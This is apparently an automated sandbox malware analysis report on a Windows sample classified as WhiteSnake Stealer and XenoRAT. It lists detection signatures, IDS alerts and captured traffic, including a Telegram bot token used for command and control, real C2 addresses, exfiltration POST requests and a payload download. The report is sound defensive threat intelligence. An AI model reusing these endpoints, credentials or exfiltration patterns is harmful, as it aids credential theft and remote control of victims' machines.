Windows Analysis Report
0LpFv1haTA.exe

Overview

General Information

Sample name: 0LpFv1haTA.exe
renamed because original name is a hash value
Original sample name: 1bafb4856a31ae27271fbd2ee1574a4f.exe
Analysis ID: 1520806
MD5: 1bafb4856a31ae27271fbd2ee1574a4f
SHA1: b8b3649d959524df2c4e8a94434fc0de90f95005
SHA256: 91cfd0498b16d33890d8d4f4f1b69daaad5d703f898f46b811f73e92be19e5ff
Tags: exeXenoRATuser-abuse_ch
Infos:

Detection

WhiteSnake Stealer, XenoRAT
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Capture Wi-Fi password
Sigma detected: Scheduled temp file as task from temp location
Suricata IDS alerts for network traffic
Yara detected Telegram RAT
Yara detected WhiteSnake Stealer
Yara detected XenoRAT
.NET source code contains potential unpacker
.NET source code contains very large strings
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
Machine Learning detection for dropped file
Machine Learning detection for sample
Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)
Queries sensitive service information (via WMI, Win32_LogicalDisk, often done to detect sandboxes)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Self deletion via cmd or bat file
Sigma detected: Invoke-Obfuscation CLIP+ Launcher
Sigma detected: Invoke-Obfuscation VAR+ Launcher
Sigma detected: Potentially Suspicious Malware Callback Communication
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal WLAN passwords
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses known network protocols on non-standard ports
Uses netsh to modify the Windows network and firewall settings
Uses schtasks.exe or at.exe to add and modify task schedules
Uses the Telegram API (likely for C&C communication)
Yara detected Generic Downloader
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Downloads executable code via HTTP
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
One or more processes crash
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Communication To Uncommon Destination Ports
Sigma detected: Port Forwarding Activity Via SSH.EXE
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Schtasks From Env Var Folder
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Credential Stealer

Classification

AV Detection
barindex
Antivirus / Scanner detection for submitted sample
Source: 0LpFv1haTA.exe Avira: detected
Antivirus detection for dropped file
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Avira: detection malicious, Label: TR/Dropper.Gen
Found malware configuration
Source: 41.0.manager.exe.240000.0.unpack Malware Configuration Extractor: XenoRAT {"C2 url": "193.149.187.135", "Mutex Name": "Xeno_rat_nd8912d", "Install Folder": "appdata"}
Source: 0LpFv1haTA.exe.5500.13.memstrmin Malware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot7935489665:AAE2XyOo-0CSgW-NXoz80QphaaOkmebwR5Q/sendMessage"}
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe ReversingLabs: Detection: 81%
Source: C:\Users\user\AppData\Roaming\XenoManager\manager.exe ReversingLabs: Detection: 91%
Source: C:\Users\user\AppData\Roaming\manager.exe ReversingLabs: Detection: 91%
Multi AV Scanner detection for submitted file
Source: 0LpFv1haTA.exe ReversingLabs: Detection: 81%
AI detected suspicious sample
Source: Submited Sample Integrated Neural Analysis Model: Matched 99.8% probability
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\XenoManager\manager.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\manager.exe Joe Sandbox ML: detected
Machine Learning detection for sample
Source: 0LpFv1haTA.exe Joe Sandbox ML: detected
Uses Microsoft's Enhanced Cryptographic Provider
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Code function: 7_2_00007FF848F187D1 CryptUnprotectData, 7_2_00007FF848F187D1
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Code function: 13_2_00007FF848F187C1 CryptUnprotectData, 13_2_00007FF848F187C1
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Code function: 13_2_00007FF848F1890D CryptUnprotectData, 13_2_00007FF848F1890D
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49712 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49713 version: TLS 1.2
Source: 0LpFv1haTA.exe Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: System.Xml.ni.pdb source: WER895A.tmp.dmp.36.dr
Source: Binary string: System.ni.pdbRSDS source: WER895A.tmp.dmp.36.dr
Source: Binary string: System.pdbN|2h|2 Z|2_CorDllMainmscoree.dll source: 0LpFv1haTA.exe, 0000000D.00000002.2440409629.000001E449ED9000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: System.Windows.Forms.ni.pdb source: WER895A.tmp.dmp.36.dr
Source: Binary string: System.Drawing.ni.pdb source: WER895A.tmp.dmp.36.dr
Source: Binary string: System.Configuration.ni.pdb source: WER895A.tmp.dmp.36.dr
Source: Binary string: mscorlib.ni.pdbRSDS7^3l source: WER895A.tmp.dmp.36.dr
Source: Binary string: System.Configuration.pdb source: WER895A.tmp.dmp.36.dr
Source: Binary string: System.Drawing.ni.pdbRSDS source: WER895A.tmp.dmp.36.dr
Source: Binary string: rlib.pdb source: 0LpFv1haTA.exe, 0000000D.00000002.2450732907.000001E4629D4000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Xml.pdb source: WER895A.tmp.dmp.36.dr
Source: Binary string: System.pdb source: 0LpFv1haTA.exe, 0000000D.00000002.2440409629.000001E449ED9000.00000004.00000800.00020000.00000000.sdmp, WER895A.tmp.dmp.36.dr
Source: Binary string: System.Xml.ni.pdbRSDS# source: WER895A.tmp.dmp.36.dr
Source: Binary string: System.Core.ni.pdb source: WER895A.tmp.dmp.36.dr
Source: Binary string: System.Windows.Forms.pdb source: WER895A.tmp.dmp.36.dr
Source: Binary string: mscorlib.pdb source: 0LpFv1haTA.exe, 0000000D.00000002.2440409629.000001E449ED9000.00000004.00000800.00020000.00000000.sdmp, WER895A.tmp.dmp.36.dr
Source: Binary string: \??\C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.PDB,D source: 0LpFv1haTA.exe, 0000000D.00000002.2450732907.000001E4629D4000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Management.ni.pdbRSDSJ< source: WER895A.tmp.dmp.36.dr
Source: Binary string: System.Windows.Forms.ni.pdbRSDS source: WER895A.tmp.dmp.36.dr
Source: Binary string: System.Drawing.pdb source: WER895A.tmp.dmp.36.dr
Source: Binary string: System.Management.pdb source: WER895A.tmp.dmp.36.dr
Source: Binary string: mscorlib.ni.pdb source: WER895A.tmp.dmp.36.dr
Source: Binary string: System.Management.ni.pdb source: WER895A.tmp.dmp.36.dr
Source: Binary string: rlib.pdba source: 0LpFv1haTA.exe, 0000000D.00000002.2450732907.000001E4629D4000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Core.pdb source: WER895A.tmp.dmp.36.dr
Source: Binary string: System.Core.pdb` source: WER895A.tmp.dmp.36.dr
Source: Binary string: mscorlib.pdb ` source: WER895A.tmp.dmp.36.dr
Source: Binary string: System.Drawing.pdb` source: WER895A.tmp.dmp.36.dr
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdbh source: 0LpFv1haTA.exe, 0000000D.00000002.2450732907.000001E4629A0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Configuration.ni.pdbRSDScUN source: WER895A.tmp.dmp.36.dr
Source: Binary string: System.Configuration.pdbP source: WER895A.tmp.dmp.36.dr
Source: Binary string: System.ni.pdb source: WER895A.tmp.dmp.36.dr
Source: Binary string: System.Core.ni.pdbRSDS source: WER895A.tmp.dmp.36.dr
Found inlined nop instructions (likely shell or obfuscated code)
Source: C:\Users\user\Desktop\0LpFv1haTA.exe Code function: 4x nop then dec eax 0_2_00007FF848F05453
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Code function: 4x nop then jmp 00007FF848F1D416h 7_2_00007FF848F1CD0F
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Code function: 4x nop then dec eax 7_2_00007FF848F165B0
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Code function: 4x nop then jmp 00007FF848F1E8B0h 7_2_00007FF848F1E0C4
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Code function: 4x nop then jmp 00007FF848F1DAA9h 7_2_00007FF848F1BB98
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Code function: 4x nop then dec eax 7_2_00007FF848F216DF
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Code function: 4x nop then jmp 00007FF848F1DAA9h 7_2_00007FF848F1D59F
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Code function: 4x nop then jmp 00007FF848F2055Dh 7_2_00007FF848F20459
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Code function: 4x nop then jmp 00007FF848F14908h 7_2_00007FF848F14894
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Code function: 4x nop then jmp 00007FF848F14934h 7_2_00007FF848F148F3
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Code function: 4x nop then jmp 00007FF848F1E577h 7_2_00007FF848F1E37C
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Code function: 4x nop then jmp 00007FF848F1DA99h 13_2_00007FF848F1BAE2
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Code function: 4x nop then jmp 00007FF848F2C369h 13_2_00007FF848F2C135
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Code function: 4x nop then jmp 00007FF848F14934h 13_2_00007FF848F14141
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Code function: 4x nop then dec eax 13_2_00007FF848F1615E
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Code function: 4x nop then jmp 00007FF848F1DA99h 13_2_00007FF848F1B9ED
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Code function: 4x nop then jmp 00007FF848F2E654h 13_2_00007FF848F2E49A
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Code function: 4x nop then jmp 00007FF848F1D20Fh 13_2_00007FF848F1CC9E
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Code function: 4x nop then jmp 00007FF848F1D406h 13_2_00007FF848F1CC9E
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Code function: 4x nop then jmp 00007FF848F2210Dh 13_2_00007FF848F21E8E
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Code function: 4x nop then jmp 00007FF848F1E567h 13_2_00007FF848F1DD70
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Code function: 4x nop then jmp 00007FF848F1E8A0h 13_2_00007FF848F1DD70
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Code function: 4x nop then jmp 00007FF848F21648h 13_2_00007FF848F210BE
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Code function: 4x nop then dec eax 13_2_00007FF848F14F54
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Code function: 4x nop then jmp 00007FF848F237F1h 13_2_00007FF848F232C9
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Code function: 4x nop then jmp 00007FF848F1DA99h 13_2_00007FF848F1D58F
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Code function: 4x nop then jmp 00007FF848F17A3Ch 13_2_00007FF848F17839
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Code function: 4x nop then jmp 00007FF848F14908h 13_2_00007FF848F14894
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Code function: 4x nop then dec eax 13_2_00007FF848F1FFBF
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Code function: 4x nop then dec eax 40_2_00007FF848F26DD0
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Code function: 4x nop then jmp 00007FF848F27A3Ch 40_2_00007FF848F27858
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Code function: 4x nop then jmp 00007FF848F24908h 40_2_00007FF848F24894
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Code function: 4x nop then jmp 00007FF848F24934h 40_2_00007FF848F248F3
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Code function: 4x nop then jmp 00007FF848F27A3Ch 40_2_00007FF848F25792
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Code function: 4x nop then dec eax 40_2_00007FF848F29BF6
Source: C:\Users\user\AppData\Roaming\manager.exe Code function: 4x nop then jmp 023B185Ah 41_2_023B0B88
Source: C:\Users\user\AppData\Roaming\XenoManager\manager.exe Code function: 4x nop then jmp 0322185Ah 42_2_03220B88
Source: C:\Users\user\AppData\Roaming\XenoManager\manager.exe Code function: 4x nop then jmp 0322185Ah 42_2_03220B78
Source: C:\Users\user\AppData\Roaming\XenoManager\manager.exe Code function: 4x nop then jmp 00ED185Ah 45_2_00ED0B88
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Code function: 4x nop then jmp 00007FF848F34934h 46_2_00007FF848F34141
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Code function: 4x nop then dec eax 46_2_00007FF848F34F54
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Code function: 4x nop then jmp 00007FF848F34908h 46_2_00007FF848F34894
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Code function: 4x nop then dec eax 47_2_00007FF848F166FB
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Code function: 4x nop then jmp 00007FF848F14934h 47_2_00007FF848F14141
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Code function: 4x nop then dec eax 47_2_00007FF848F14F54
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Code function: 4x nop then jmp 00007FF848F14908h 47_2_00007FF848F14894
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Code function: 4x nop then dec eax 47_2_00007FF848F19D36
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Code function: 4x nop then jmp 00007FF848F17B7Ch 47_2_00007FF848F17979
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Code function: 4x nop then dec eax 48_2_00007FF848F16F09
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Code function: 4x nop then jmp 00007FF848F14908h 48_2_00007FF848F14894
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Code function: 4x nop then jmp 00007FF848F14934h 48_2_00007FF848F148F3
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Code function: 4x nop then dec eax 48_2_00007FF848F19D36
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Code function: 4x nop then jmp 00007FF848F17B7Ch 48_2_00007FF848F17979

Networking
barindex
Suricata IDS alerts for network traffic
Source: Network traffic Suricata IDS: 2050601 - Severity 1 - ET MALWARE [ANY.RUN] WhiteSnake Stealer HTTP Request : 192.168.2.5:49711 -> 185.253.7.60:8080
Source: Network traffic Suricata IDS: 2050601 - Severity 1 - ET MALWARE [ANY.RUN] WhiteSnake Stealer HTTP Request : 192.168.2.5:49708 -> 185.253.7.60:8080
Source: Network traffic Suricata IDS: 2050602 - Severity 1 - ET MALWARE [ANY.RUN] WhiteSnake Stealer HTTP POST Report Exfiltration : 192.168.2.5:49711 -> 185.253.7.60:8080
Source: Network traffic Suricata IDS: 2045868 - Severity 1 - ET MALWARE [ANY.RUN] WhiteSnake Stealer Reporting Request (Outbound) : 192.168.2.5:49738 -> 45.82.65.63:80
Source: Network traffic Suricata IDS: 2045868 - Severity 1 - ET MALWARE [ANY.RUN] WhiteSnake Stealer Reporting Request (Outbound) : 192.168.2.5:49739 -> 188.120.242.78:8817
Source: Network traffic Suricata IDS: 2045868 - Severity 1 - ET MALWARE [ANY.RUN] WhiteSnake Stealer Reporting Request (Outbound) : 192.168.2.5:49729 -> 167.99.138.249:8080
Source: Network traffic Suricata IDS: 2045868 - Severity 1 - ET MALWARE [ANY.RUN] WhiteSnake Stealer Reporting Request (Outbound) : 192.168.2.5:49737 -> 206.189.109.146:80
Source: Network traffic Suricata IDS: 2050602 - Severity 1 - ET MALWARE [ANY.RUN] WhiteSnake Stealer HTTP POST Report Exfiltration : 192.168.2.5:49708 -> 185.253.7.60:8080
Source: Network traffic Suricata IDS: 2045869 - Severity 1 - ET MALWARE WhiteSnake Stealer Telegram Checkin : 192.168.2.5:49740 -> 149.154.167.220:443
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: 193.149.187.135
Uses known network protocols on non-standard ports
Source: unknown Network traffic detected: HTTP traffic on port 49739 -> 8817
Source: unknown Network traffic detected: HTTP traffic on port 8817 -> 49739
Source: unknown Network traffic detected: HTTP traffic on port 8817 -> 49739
Uses the Telegram API (likely for C&C communication)
Source: unknown DNS query: name: api.telegram.org
Yara detected Generic Downloader
Source: Yara match File source: 0LpFv1haTA.exe, type: SAMPLE
Source: Yara match File source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe, type: DROPPED
Detected TCP or UDP traffic on non-standard ports
Source: global traffic TCP traffic: 192.168.2.5:49708 -> 185.253.7.60:8080
Source: global traffic TCP traffic: 192.168.2.5:49729 -> 167.99.138.249:8080
Source: global traffic TCP traffic: 192.168.2.5:49739 -> 188.120.242.78:8817
Source: global traffic TCP traffic: 192.168.2.5:49744 -> 193.149.187.135:4444
Downloads executable code via HTTP
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 27 Sep 2024 21:28:02 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Sun, 22 Sep 2024 18:44:49 GMTETag: "cc00-622b9aabbea40"Accept-Ranges: bytesContent-Length: 52224Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 ba 98 e7 d4 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 c2 00 00 00 08 00 00 00 00 00 00 de e1 00 00 00 20 00 00 00 00 01 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 40 01 00 00 02 00 00 00 00 00 00 02 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 84 e1 00 00 57 00 00 00 00 00 01 00 d0 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 01 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 e4 c1 00 00 00 20 00 00 00 c2 00 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 d0 05 00 00 00 00 01 00 00 06 00 00 00 c4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 20 01 00 00 02 00 00 00 ca 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 e1 00 00 00 00 00 00 48 00 00 00 02 00 05 00 90 7a 00 00 f4 66 00 00 03 00 02 00 70 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6d 6f 6f 6d 38 32 35 00 03 ac 67 42 16 f3 e1 5c 76 1e e1 a5 e2 55 f0 67 95 36 23 c8 b3 88 b4 45 9e 13 f9 78 d7 c8 46 f4 22 02 28 17 00 00 0a 00 2a da 02 73 18 00 00 0a 7d 03 00 00 04 02 72 01 00 00 70 7d 04 00 00 04 02 28 17 00 00 0a 00 00 28 19 00 00 0a 14 fe 06 0b 00 00 06 73 1a 00 00 0a 6f 1b 00 00 0a 00 2a 06 2a 5e 02 28 17 00 00 0a 00 00 02 04 7d 1b 00 00 04 02 03 7d 1a 00 00 04 2a 0a 00 2a de 02 73 6c 00 00 0a 7d 6f 00 00 04 02 15 7d 72 00 00 04 02 15 7d 73 00 00 04 02 15 7d 74 00 00 04 02 28 17 00 00 0a 00 00 02 03 7d 70 00 00 04 02 04 7d 6e 00 00 04 2a 3e 00 02 7b 6f 00 00 04 03 6f 6d 00 00 0a 00 2a 3e 00 02 7b 70 00 00 04 03 6f 5a 00 00 06 00 2a 3a 00 02 7b 70 00 00 04 6f 5b 00 00 06 00 2a 5a 02 16 7d ab 00 00 04 02 17 7d ad 00 00 04 02 28 17 00 00 0a 00 2a ae 02 16 7d b0 00 00 04 02 28 17 00 00 0a 00 00 02 03 7d ae 00 00 04 02 7b ae 00 00 04 17 6f 98 00 00 0a 00 02 04 7d af 00 00 04 2a 5
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /bot7935489665:AAE2XyOo-0CSgW-NXoz80QphaaOkmebwR5Q/sendMessage?chat_id=-4578472389&text=%23MSWINDOW%20%23Heartbeat%20received%20from%20beacon%0A%0A%3Cb%3EOS%3A%3C%2Fb%3E%20%3Ci%3EMicrosoft%20Windows%20NT%206.2.9200.0%3C%2Fi%3E%0A%3Cb%3ECountry%3A%3C%2Fb%3E%20%3Ci%3EUnited%20States%3C%2Fi%3E%0A%3Cb%3EUsername%3A%3C%2Fb%3E%20%3Ci%3Euser%3C%2Fi%3E%0A%3Cb%3ECompname%3A%3C%2Fb%3E%20%3Ci%3E051829%3C%2Fi%3E%0A%0A%3Cb%3EServing%20on%3A%3C%2Fb%3E%20%3Ci%3Ehttps%3A%2F%2F0bdcbb891d3c57c2a3bd914febf5955f.serveo.net%3C%2Fi%3E%0A%0A&parse_mode=HTML HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /bot7935489665:AAE2XyOo-0CSgW-NXoz80QphaaOkmebwR5Q/sendMessage?chat_id=-4578472389&text=%23MSWINDOW%20%23Heartbeat%20received%20from%20beacon%0A%0A%3Cb%3EOS%3A%3C%2Fb%3E%20%3Ci%3EMicrosoft%20Windows%20NT%206.2.9200.0%3C%2Fi%3E%0A%3Cb%3ECountry%3A%3C%2Fb%3E%20%3Ci%3EUnited%20States%3C%2Fi%3E%0A%3Cb%3EUsername%3A%3C%2Fb%3E%20%3Ci%3Euser%3C%2Fi%3E%0A%3Cb%3ECompname%3A%3C%2Fb%3E%20%3Ci%3E051829%3C%2Fi%3E%0A%0A%3Cb%3EServing%20on%3A%3C%2Fb%3E%20%3Ci%3Ehttps%3A%2F%2F8f7482867cc6a5aec99ead5e72d7016e.serveo.net%3C%2Fi%3E%0A%0A&parse_mode=HTML HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /bot7935489665:AAE2XyOo-0CSgW-NXoz80QphaaOkmebwR5Q/sendMessage?chat_id=-4578472389&text=%23MSWINDOW%20%20%23Beacon%0A%0A%3Cb%3EOS%3A%3C%2Fb%3E%20%3Ci%3EMicrosoft%20Windows%20NT%206.2.9200.0%3C%2Fi%3E%0A%3Cb%3ECountry%3A%3C%2Fb%3E%20%3Ci%3EUnited%20States%3C%2Fi%3E%0A%3Cb%3EUsername%3A%3C%2Fb%3E%20%3Ci%3Euser%3C%2Fi%3E%0A%3Cb%3ECompname%3A%3C%2Fb%3E%20%3Ci%3E051829%3C%2Fi%3E%0A%0A%3Cb%3EReport%20size%3A%3C%2Fb%3E%200.13Mb%0A&reply_markup=%7B%22inline_keyboard%22%3A%5B%5B%7B%22text%22%3A%22Download%22%2C%22url%22%3A%22http%3A%2F%2F188.120.242.78%3A8817%2Fget%2FJfGGV6ePde%2F9IYTn_user%40051829_report.wsr%22%7D%2C%7B%22text%22%3A%22Open%22%2C%22url%22%3A%22http%3A%2F%2F127.0.0.1%3A18772%2FhandleOpenWSR%3Fr%3Dhttp%3A%2F%2F188.120.242.78%3A8817%2Fget%2FJfGGV6ePde%2F9IYTn_user%40051829_report.wsr%22%7D%5D%5D%7D&parse_mode=HTML HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /line?fields=query,country HTTP/1.1Host: ip-api.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST //sendData?pk=MDM2MDQ3RTJFN0NDMTE4MjQzNkMzMUU0NEE4Nzg4QUU=&ta=TVNXSU5ET1c=&un=YWxmb25z&pc=MDUxODI5&co=VW5pdGVkIFN0YXRlcw==&wa=MA==&be=MQ== HTTP/1.1Host: 185.253.7.60:8080Content-Length: 135595Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /line?fields=query,country HTTP/1.1Host: ip-api.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST //sendData?pk=MDM2MDQ3RTJFN0NDMTE4MjQzNkMzMUU0NEE4Nzg4QUU=&ta=TVNXSU5ET1c=&un=YWxmb25z&pc=MDUxODI5&co=VW5pdGVkIFN0YXRlcw==&wa=MA==&be=MQ== HTTP/1.1Host: 185.253.7.60:8080Content-Length: 140694Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /manager.exe HTTP/1.1Host: 185.80.128.17Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET //mnemonic-verify/52F48616470571256761856660/036047E2E7CC1182436C31E44A8788AE HTTP/1.1Host: 185.253.7.60:8080Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET //mnemonic-verify/52F48616470571256761856660/036047E2E7CC1182436C31E44A8788AE HTTP/1.1Host: 185.253.7.60:8080Connection: Keep-Alive
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 208.95.112.1 208.95.112.1
Source: Joe Sandbox View IP Address: 149.154.167.220 149.154.167.220
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: THEFIRST-ASRU THEFIRST-ASRU
Source: Joe Sandbox View ASN Name: TELEGRAMRU TELEGRAMRU
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
May check the online IP address of the machine
Source: unknown DNS query: name: ip-api.com
Source: unknown TCP traffic detected without corresponding DNS query: 185.253.7.60
Source: unknown TCP traffic detected without corresponding DNS query: 185.253.7.60
Source: unknown TCP traffic detected without corresponding DNS query: 185.253.7.60
Source: unknown TCP traffic detected without corresponding DNS query: 185.253.7.60
Source: unknown TCP traffic detected without corresponding DNS query: 185.253.7.60
Source: unknown TCP traffic detected without corresponding DNS query: 185.253.7.60
Source: unknown TCP traffic detected without corresponding DNS query: 185.253.7.60
Source: unknown TCP traffic detected without corresponding DNS query: 185.253.7.60
